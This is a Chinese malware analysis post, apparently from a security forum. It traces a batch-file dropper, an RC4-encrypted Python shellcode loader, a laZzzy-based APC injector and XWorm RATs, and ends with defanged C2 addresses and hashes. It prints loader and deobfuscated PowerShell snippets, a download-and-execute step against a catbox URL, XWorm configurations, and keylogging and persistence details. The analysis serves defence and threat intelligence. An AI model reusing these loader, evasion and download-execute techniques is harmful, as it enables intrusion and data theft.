本帖最后由 wwwab 于 2025-6-1 20:30 编辑
一、背景
近期发现一枚样本,传播载体为批处理文件(cl.bat),经过分析发现其通过"net use"命令将某Cloudflare Tunnel内网穿透服务挂载为网络驱动器后,下载并运行其中的恶意Python脚本(yea.py)。该py脚本为典型的ShellCode加载器,通过donut生成的ShellCode二进制经过base64编码+RC4加密两层处理之后在脚本中反序列化加载(调用Windows API VirtualProtect修改内存属性为可读可执行,将解密后的二进制数据强制转换为函数指针,并直接调用函数指针执行内存中的ShellCode),将其ShellCode提取并分析后发现其基于开源项目laZzzy修改,会拉起notepad进行APC早鸟注入,连接C2(95[.]217[.]129[.]88[:]5921)接收指令。
该黑客警惕性高,样本传播12小时后迅速关停了当前使用的Cloudflare Tunnel内网穿透服务和C2。由于分析时C2已离线,通过对威胁情报进行研判发现:
(1)威胁情报信息显示,在连接该C2的样本中发现了另一个Donut ShellCode,对该新发现的ShellCode进行研判后发现其为直接连接该C2的XWorm木马 (C2: 95[.]217[.]129[.]88[:]5921; Version: XWorm V5.6)。
(2)威胁情报信息显示,该C2曾下发通过PowerShell下载其他载荷的指令,对此载荷做进一步分析和威胁情报研判后发现该载荷是连接另一个C2的XWorm木马 (C2: ftpproxy672-44246[.]portmap[.]io[:]44246)。
二、样本分析
第一节:
[原始样本分析]
原始传播样本cl.bat (0d1323d50ff0496c7ee687d65050b02de85e80b81938d7e1df204ed7320ef7c2)代码如下图所示:

可见网络驱动器挂载地址: \\digital-childrens-junior-cure[.]trycloudflare[.]com@SSL\DavWWWRoot (使用Cloudflare Tunnel内网穿透服务)
代码说明如下图所示:
其下载jaka.zip (96f96b24b16109fb93d65b68c983bb2fa69f07232212437c53d6bb32642f93c3)并解压出yea.py (f27344ae5b14d85975391f8fec471ee806e85568c6d87ac835693b47a7bacfad),使用jaka.zip内携带的Python环境启动,执行其中的代码。
jaka结构如下图所示:
yea.py代码如下图所示:
在yea.py代码中可以看到:
(1) 该脚本先对字符串中的数据进行base64解码,赋值给变量GWFiawqTIgMLwbSqDwRGMzYOKXbSpnYm.
(2) 将ASCII编码的"xWp0LaAO"字符串和basw64解码后的数据作为参数传入函数IxcXpWUvfBDATqvXtEqdwbKpAovJwfdU,将函数返回结果赋值给变量FiCSYrhwEzAKhYhvZqAiVpGrlYwsnuOS.
现在分析函数IxcXpWUvfBDATqvXtEqdwbKpAovJwfdU,其内部有一个变量IluiDvLCpTJsFOJzDLmyyyqiaMhVyKFm初始化了为一个长度为256的列表,值从0到255,用于定义一个S盒,初始化S盒等状态向量,为后续执行RC4的KSA(密钥调度算法)步骤做准备,然后将变量RuEZdSDXxJAkVRPopNlDpUedgxdYQnZp初始化为0.
代码中有两个循环。
第一个for循环遍历0到255,通过密钥对状态向量进行置换,对S盒进行打乱。
至此,符合RC4的KSA(密钥调度算法)。
在第二个循环中,变量aAKfNgohZOMShFLCIxwMcIHnbLjFjhZx和RuEZdSDXxJAkVRPopNlDpUedgxdYQnZp重新初始化为0。然后,对于数据中的每个字节,进行索引的更新、交换状态向量,并生成一个密钥流字节UVNOGXlIDSmoOkzXydluvTrriPJYzdEm。最后,将输入的数据字节与该密钥流字节进行异或操作,将结果添加到结果字节数组中,得到解密后的数据,最后返回解密后的字节。
至此,符合RC4的PRGA(伪随机生成算法)。
而"xWp0LaAO"字符串密文的则是解密密钥。
因此,黑客使用RC4加密算法(密钥: "xWp0LaAO")对恶意二进制数据进行了加密,再将密文进行了base64编码,然后存储至该Python脚本中,实现了序列化存储。
解密步骤:
法一:先将base64数据解码,再进行RC4解密(密钥: "xWp0LaAO")。解密后可得到一个通过开源项目Donut生成的ShellCode二进制
法二:由于最终解密后的数据赋值给了变量FiCSYrhwEzAKhYhvZqAiVpGrlYwsnuOS,直接修改其源代码保存解密后的数据
继续向下看,可以看到: 脚本执行了"ctypes.create_string_buffer(FiCSYrhwEzAKhYhvZqAiVpGrlYwsnuOS)"将解密后的数据写入到内存缓冲区,然后执行"ctypes.windll.kernel32.VirtualProtect"调用Windows API VirtualProtect修改内存属性为可读可执行,其中0x40是内存保护标志,表示允许读写和执行。
然后继续执行:
- pEoiTsJphfEBjJLbNFXEMvdPdvfdmibC = ctypes.cast(IvBappaUBLSolqUdSbrJfGzprBgfHtdr, ctypes.CFUNCTYPE(ctypes.c_void_p)) # 将缓冲区转换为函数指针
- pEoiTsJphfEBjJLbNFXEMvdPdvfdmibC() # 执行内存中的代码
复制代码 将解密后的二进制数据强制转换为函数指针,直接调用函数指针执行内存中的ShellCode.

我们提取并保存解密后的数据,发现其为Donut生成的ShellCode (7f48d92abd37c4c2d1ced2a850de9ff6a9b8f31113e1853a26c0d7968ae14573),如下图所示:
我们使用开源项目将该Donut ShellCode加载的内容解密,得到可供分析的可执行文件 (11a2ac0a4953482356f338ae02e110e13b6eb9b8dad1b6a1152fba7bd1d306f9) [1],如下图所示:
静态分析后发现,样本的输出信息毫不遮掩,向我们呈现出许多输出内容和字符串,显示其具备ShellCode加载、Payload解密和注入器等功能且具有多种注入方式,如下图所示:
以上信息展示出样本是一个成熟的ShellCode加载器和注入器,样本我们比对了样本中出现的字符串、输出信息和函数功能,确认该样本基于开源项目laZzzy修改。开源项目laZzzy支持的ShellCode执行技术包括但不限于:
- 1. Early-bird APC Queue (requires sacrificial process) // 早鸟APC队列注入
- 2. Thread Hijacking (requires sacrificial process) // 线程劫持
- 3. KernelCallbackTable (requires sacrificial process that has a GUI)
- 4. Section View Mapping
- 5. Thread Suspension // 线程挂起
- 6. LineDDA Callback
- 7. EnumSystemGeoID Callback
- 8. Fiber Local Storage (FLS) Callback
- 9. SetTimer
- 10. Clipboard
复制代码 如下图所示:
可以看到,该开源项目所具有的功能和支持的注入方式与上述的样本静态分析结果完全一致。
同时,样本命中了社区Yara规则"HKTL_LaZzy_Loader_Nov22_1",进一步佐证了其基于开源项目laZzzy修改,如下图所示:
动态分析后发现,样本运行后会拉起notepad进行APC早鸟注入。其将目标进程内存属性由可读可写(Read-Write)修改为可读可执行(Read-Execute),修改目标进程的APC队列,将恶意代码注入其中,远程注入notepad进程,如下图所示(图左为基于ETW-TI的行为监控工具,右图为执行样本以及样本的返回和输出,二者相吻合,结论相一致):
notepad进程被注入后会不断尝试与远程地址95[.]217[.]129[.]88[:]5921建立TCP连接,如下图所示:
[关联样本研判1]
由于C2已经离线,我们在VirusTotal平台上通过IP 95[.]217[.]129[.]88的威胁情报发现了与之相关联的另一个Donut ShellCode (2ad007f1bb1668e52e096d1bde95e57f1a2a2cfdd42fe37411963e131adf2fd0),解密后关联到样本8d937db7e89980ba45a77f3f0a09cc7898c01c1991f85dd052d93783aad88bd9. 从当时的动态运行结果可以证实其为XWorm木马,且版本为XWorm V5.6,样本配置为:
- {'XWorm': {'Sleep': [3], 'Hosts': ['95.217.129.88'], 'Port': ['5921'], 'KEY': ['<123456789>'], 'SPL': ['<Xwormmm>'], 'Groub': ['XWorm V5.6'], 'USBNM': ['USB.exe'], 'Mutex': ['MZL6j42k9OgGAoZY']}}
- {"C2 url": ["95.217.129.88"], "Port": 5921, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
复制代码
如下图所示:

第二节:
[关联样本研判2]
[1] 对于第一节中的原始样本分析,由于根据解密方式的不同,得到的文件可能略有差异——Hash不同,但总体相同。我们在VirusTotal威胁情报平台上观察到另一份与之相关联的由该ShellCode解密得到的可执行文件 (964f5015772aa4a6cf67b083648ba56625221cc8892e861a39351a977bfa6150)。如下图所示:
PE结构对比,如下图所示:
强调该文件是由于该文件在VirusTotal威胁情报平台中的Microsoft Sysinternals沙盒运行时C2存活并下发了执行PowerShell命令的指令,被沙盒有效记载,由于C2目前已经离线,因此其具有较高的威胁情报价值。
我们可以在Shell Commands和Processes Tree信息中观察到PowerShell被拉起时的进程树,并看到其执行的命令行信息和PowerShell命令,如下图所示:
可以看到其通过PowerShell静默下载并执行https[:]//files.catbox[.]moe/69b44f[.]ps1脚本 (d03a44e92a67dbb9bb6befdd2c0b3c7844e9f64fb847eff6bbc1ad09d679e273)。
我们将该脚本下载后,可以看到脚本中的变量 ${IndianiqsqD`Chtl`S} 由多个编码片段拼接而成,如下图所示:
对于第一组编码数据,我们猜测为Hex数据,开头部分数据为: 0x54, 0x56, 0x71, 0x51, 0x41, 0x41, 0x4d, 0x41, 0x41, 0x41, 0x41, 0x45, 0x41, 0x41, 0x41, 0x41, 0x2f, 0x2f,将其转换为字符串后为: "TVqQAAMAAAAEAAAA//",再讲该字符串进行base64解码后就会得到Windows PE文件的MZ头,因此该脚本通过base64编码+Hex编码序列化存储了一个二进制可执行文件。如下图所示:
由于脚本中多个部分使用不同的编码方法,并且拆得非常零散,如果一个一个手动进行解码再拼接工作量大且十分复杂,我们直接滑动到脚本底部查看其拼接、反序列化和释放并写入文件的部分。
分析脚本底部的部分变量:
PowerShell 中反引号 ` 是转义字符,变量名中的反引号不会影响实际变量名,反引号在PowerShell 中用来转义特殊字符,所以这里可能是在故意混淆变量名,让分析变得困难。
对于变量 ${InDIankpMjbYeDtf} ,可以看到赋值的内容是 [sYstEm.iO.PAtH]::gEtTemPpath(),即获取系统临时目录并赋值。
对于变量 $indIanRJLztrDfju,可以看到赋值的内容末尾是".exe",其在拼接exe文件的所在目录(${indiankPMJByEDtf})和文件名({InDianwuCrZjtWnS}.exe),即文件路径,并赋值。
对于变量 ${IndIanadZvBsCmdZ} ,可以看到赋值内容末尾是".bat",其在拼接批处理文件的所在目录({in`DiankpmjbyEDtf})和文件名(${IndIanWucrZjtWnS}.bat),即文件路径,并赋值。
对于变量 ${InDianXtLIjxmcWX} ,可以看到其赋值的内容是拼接出来的批处理命令: "@echo off`ntimeout /t 2 /nobreak>nul`ndel `"$InDianrJLztrDfJu`" /f /q`nexit"
再解密[char]表达式:
对于表达式- [char]((19002 - 9867 - 3089 - 5968))+[char](((980 -Band 7475) + (980 -Bor 7475) - 17 - 8337))+[char]((-3995 - 2033 - 2118 + 8265))+[char]((-1228 - 4793 + 4838 + 1228))+[char](((-12598 -Band 5996) + (-12598 -Bor 5996) + 1865 + 4816))+[char](((-3392 -Band 2765) + (-3392 -Bor 2765) + 2332 - 1607))+[char](((-16650 -Band 2904) + (-16650 -Bor 2904) + 9290 + 4562))+[char]((-3687 - 6737 + 1379 + 9146))+[char](((-6385 -Band 2400) + (-6385 -Bor 2400) + 9609 - 5525))+[char](((8580 -Band 8726) + (8580 -Bor 8726) - 9299 - 7891))
复制代码 解密结果为: New-Object
对于表达式- [char](((-3042 -Band 9181) + (-3042 -Bor 9181) - 5054 - 1002))+[char](((-7205 -Band 6236) + (-7205 -Bor 6236) - 2366 + 3451))+[char]((-8213 - 1056 + 8357 + 1009))+[char](((-6809 -Band 7938) + (-6809 -Bor 7938) - 215 - 800))+[char](((-4455 -Band 4808) + (-4455 -Bor 4808) + 3896 - 4133))+[char](((485 -Band 1549) + (485 -Bor 1549) - 2869 + 880))+[char](((5055 -Band 498) + (5055 -Bor 498) - 4931 - 542))+[char]((8030 - 4044 - 2553 - 1319))+[char]((-15464 - 2385 + 9245 + 8715))+[char](((-8969 -Band 8206) + (-8969 -Bor 8206) - 3948 + 4810))+[char](((-10583 -Band 9149) + (-10583 -Bor 9149) + 8015 - 6480))+[char](((10950 -Band 1116) + (10950 -Bor 1116) - 5894 - 6057))+[char]((10835 - 5184 - 2482 - 3054))
复制代码 解密结果为: Start-Process
如下图所示:
我们将第一条[char]表达式解密后代入原代码,发现其使用System.Diagnostics.ProcessStartInfo启动静默无窗口该可执行文件:
- ${inDiangcPYCWauLx}=New-Object System.Diagnostics.ProcessStartInfo;${`In`Dian`G`CPYcwa`ULX}.FIleNAme=$inDIanRJLztrDfJU;${ind`Iang`Cp`YCwa`UL`X}.CrEaTEnOwIndoW=([bOol][CHaR]);${in`Diangc`Py`Cwau`LX}.WindOwstYLE=0;${ind`IangtCsik`Ocrc}=[syStem.diAGNOstIcs.pRoCeSS]::sTaRt(${inDIangcPyCWaulx})
复制代码
代码说明如下:
- # 创建 ProcessStartInfo 对象 (变量名混淆: inDiangcPYCWauLx)
- ${inDiangcPYCWauLx} = New-Object System.Diagnostics.ProcessStartInfo
- # 设置要执行的程序路径,来自变量 $inDIanRJLztrDfJU 的值
- # 变量名混淆: `In`Dian`G`CPYcwa`ULX
- # 实际对应: ${inDiangcPYCWauLx}.FileName = $inDIanRJLztrDfJU
- ${`In`Dian`G`CPYcwa`ULX}.FIleNAme = $inDIanRJLztrDfJU
- # 设置不创建新窗口 (通过字符强制类型转换设置布尔值 [生成 $true])
- # [char] 空值被转换为布尔值 $true
- # 变量名混淆: ind`Iang`Cp`YCwa`UL`X; 方法名混淆: CrEaTEnOwIndoW ...
- # 实际对应: ${indIangCpYCwaULX}.CreateNoWindoW = ([bool][char])
- ${ind`Iang`Cp`YCwa`UL`X}.CrEaTEnOwIndoW = ([bOol][CHaR])
- # 设置窗口样式为隐藏 (0 = Hidden)
- # 变量名混淆: in`Diangc`Py`Cwau`LX; 方法名混淆: WindOwstYLE
- # 实际对应: ${inDiangcPyCwauLX}.WindowStyle = 0
- ${in`Diangc`Py`Cwau`LX}.WindOwstYLE = 0
- # 启动配置好的进程
- # 变量名混淆: indIangtCsikOcrc; 方法名混淆:sTaRt ...
- # 实际对应: ${indIangtCsikOcrc} = [System.Diagnostics.Process]::Start(${inDIangcPyCWaulx})
- # 实际调用: System.Diagnostics.Process.Start()
- ${ind`IangtCsik`Ocrc} = [syStem.diAGNOstIcs.pRoCeSS]::sTaRt(${inDIangcPyCWaulx})
复制代码
我们将第二条[char]表达式解密后代入原代码,继续看到末尾的部分代码:
- Start-Process -FilePath ([syStem.TeXt.enCoDing]::utf8.GETSTRing((99, 109, 100, 46)) + [SYSTeM.TExt.eNcOdInG]::UTf8.GEtstRinG((0x65, 0x78, 0x65))) -ArgumentList "/c ${indianadZvBSCMDZ}" -WindowStyle Hidden
复制代码
对于Dec 99, 109, 100, 46,我们对照ASCII码表可得结果:
Dec 99 => c
Dec 109 => m
Dec 100 => d
Dec 46 => .
对于Hex 0x65, 0x78, 0x65,我们将其转换为字符串后确认为"exe",如下图所示:
可见,脚本末尾执行了:
Start-Process -FilePath cmd.exe -ArgumentList "/c ${indianadZvBSCMDZ}" -WindowStyle Hidden
静默无窗口执行,以f"cmd.exe /c ${indianadZvBSCMDZ}"命令行启动cmd执行bat文件,其中${indianadZvBSCMDZ}为bat文件路径。
结合上述分析,该脚本通过使用System.Diagnostics.ProcessStartInfo启动该可执行文件,然后通过PowerShell.exe拉起cmd.exe执行其下放的批处理文件来删除该可执行文件,并退出环境。
根据以上分析,我们修改以上相关脚本末尾代码,将该可执行文件安全写入至当前目录且不执行(去除启动并执行代码,使其生成后不执行):
- # 原始混淆变量定义(路径生成部分修改为当前目录)
- ${In`DIankpMjb`YeDtf} = [System.Environment]::CurrentDirectory # 修改点:临时目录=>当前目录
- $indIanRJLztrDfju = "${In`DIankpMjb`YeDtf}\${In`Dianwu`Cr`ZjtWnS}.exe" # 修改点:路径拼接
- # 原始字节写入逻辑(完全保留)
- [IO.File]::WriteAllBytes($indIanrjlztrdfJu, ${indIanrvtnOLJbYg})
- # 原始.bat文件生成逻辑(完全保留)
- ${IndIanadZvBsCmdZ} = "${In`DIankpMjb`YeDtf}\${`IndIan`Wucr`Zjt`Wn`S}.bat"
- ${In`Dian`XtL`Ijxmc`W`X} = @"
- @echo off
- timeout /t 2 /nobreak>nul
- del "$indIanrJLztrDfJu" /f /q
- exit
- "@
- # 原始字节写入逻辑(完全保留)
- [IO.File]::WriteAllText(${IndIanaDz`VbScmdz}, ${`IndIanxtL`IjX`Mcwx})
- # 输出生成的文件信息
- Get-Item $indIanrjlztrdfJu, ${IndIanaDz`VbScmdz} |
- Select Name, Directory, Length
复制代码
于是,保存脚本并运行后,我们得到了QYIFWA.bat (QYIFWA.exe启动器) 和 QYIFWA.exe (8b68728d3054a0f23ea137c6e6710dbc795b053fde677dc511c176a61286cc20),如下图所示:
QYIFWA.exe使用VB.NET编译,使用OneDrive图标,原始文件名为OneDrive.exe,其使用了多层代码壳或混淆器,静态分析难度较高。
直接对其进行反编译可以看到如下internal class: "BabelObfuscatorAttribute" "CrytpoObfuscator" "ObfuscatedByGoliath" "Reactor" "VMProtect"等。
de4dot识别到两种混淆器——Babel .NET和Goliath.NET,但无法完成脱壳和去混淆处理。
其命中两条社区Yara规则: SUSP_OBFUSC_Goliath_Obfuscator_Oct20_1 + SUSP_MSIL_NET_ConfuserEx_Module_Encryption_Sep23.
PE节区名: 节(0)-"xbS4;{"; 节(1)-".text"; 节(2)-".rsrc"; 节(3)-UPX; 节(4)-".reloc".
如下图所示:
其会尝试通过多种方式检测并反虚拟机、反调试器、反虚拟行为沙盒。
由于在本地分析环境中无法运行该样本,故结合云端沙箱的动态运行结果进行分析。
(1) 检查VMware相关文件和注册表,如下图所示:
(2) 检查VirtualBox相关文件和注册表,如下图所示:
(3) 检查注册表中BIOS版本,如下图所示:
(4) 检查注册表中SCSI接口磁盘ID,如下图所示:
(5) WMIQuery检查当前环境(包括但不限于查询Win32_VideoController、Win32_OperatingSystem、AntivirusProduct等)*,如下图所示:
(6) 查询系统硬盘大小,如下图所示:
(7) 通过检查SeDebugPrivilege权限等方式检查自身是否被调试,如下图所示:
(8) 查询CPU核心数量、计算机名、用户名,如下图所示:
* 我们同时观察到其启动后加载的COM类如下:
- CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA - WbemDefaultPathParser
- 4590F811-1D3A-11D0-891F-00AA004B2E24 - WBEM Locator
- 4590F812-1D3A-11D0-891F-00AA004B2E24 - Microsoft WBEM WbemClassObject Marshalling proxy
- 8BC3F05E-D86B-11D0-A075-00C04FB68820 - Windows Management and Instrumentation
- 7C857801-7381-11CF-884D-00AA004B2E24 - PSFactoryBuffer
- D68AF00A-29CB-43FA-8504-CE99A996D9EA - Microsoft WBEM (non)Standard Marshaling for IWbemServices
- E7D35CFA-348B-485E-B524-252725D697CA - PSFactoryBuffer
- 1B1CAD8C-2DAB-11D2-B604-00104B703EFD - Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject
复制代码
这些COM类与WMI相关。
本地分析环境下发现当其检测到虚拟机环境时,会执行'cmd.exe /c "color 03 && echo This assembly can't be executed on virtual machines! && pause',然后自退出,如下图所示:
启动后其会将自身复制到C:\Users\Public\OneDrive Updater.exe启动,并添加至注册表启动项HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive Updater处,如下图所示:
调用SetWindowsHookExW API安装Windows键盘记录消息钩子,如下图所示:
查阅文档后可确认,"idHook":"0xd"(Hex 0xd == 13)对应的Value为"WH_KEYBOARD_LL",即安装用于监视低级别键盘输入事件的挂钩过程,如下图所示:
不断尝试与远程地址ftpproxy672-44246[.]portmap[.]io[:]44246建立TCP连接,如下图所示:
[关联样本研判3]
由于C2已经离线,我们在VirusTotal平台上通过ftpproxy672-44246[.]portmap[.]io的威胁情报发现了与之相关联的另一个行为相似度较高的样本(80b781f119e4c123ce0c9829bcf6423235e17cc889b857048552434e5d78cb48). 从当时的动态运行结果可以证实其为XWorm木马,样本配置为:
- {"C2 url": ["ftpproxy672-44246.portmap.io"], "Port": 44246, "Aes key": "|||IIllIIll|||lllIIll$913\\|}{!39", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
复制代码
如下图所示:
三、附录
[IOC]
网络驱动器: digital-childrens-junior-cure[.]trycloudflare[.]com
C&C:
95[.]217[.]129[.]88[:]5921
ftpproxy672-44246[.]portmap[.]io[:]44246
Hash (以SHA-256计):
cl.bat - 0d1323d50ff0496c7ee687d65050b02de85e80b81938d7e1df204ed7320ef7c2
jaka.zip - 96f96b24b16109fb93d65b68c983bb2fa69f07232212437c53d6bb32642f93c3
yea.py - f27344ae5b14d85975391f8fec471ee806e85568c6d87ac835693b47a7bacfad
7f48d92abd37c4c2d1ced2a850de9ff6a9b8f31113e1853a26c0d7968ae14573
11a2ac0a4953482356f338ae02e110e13b6eb9b8dad1b6a1152fba7bd1d306f9
964f5015772aa4a6cf67b083648ba56625221cc8892e861a39351a977bfa6150
2ad007f1bb1668e52e096d1bde95e57f1a2a2cfdd42fe37411963e131adf2fd0
8d937db7e89980ba45a77f3f0a09cc7898c01c1991f85dd052d93783aad88bd9
69b44f.ps1 - d03a44e92a67dbb9bb6befdd2c0b3c7844e9f64fb847eff6bbc1ad09d679e273
QYIFWA.exe - 8b68728d3054a0f23ea137c6e6710dbc795b053fde677dc511c176a61286cc20
80b781f119e4c123ce0c9829bcf6423235e17cc889b857048552434e5d78cb48 |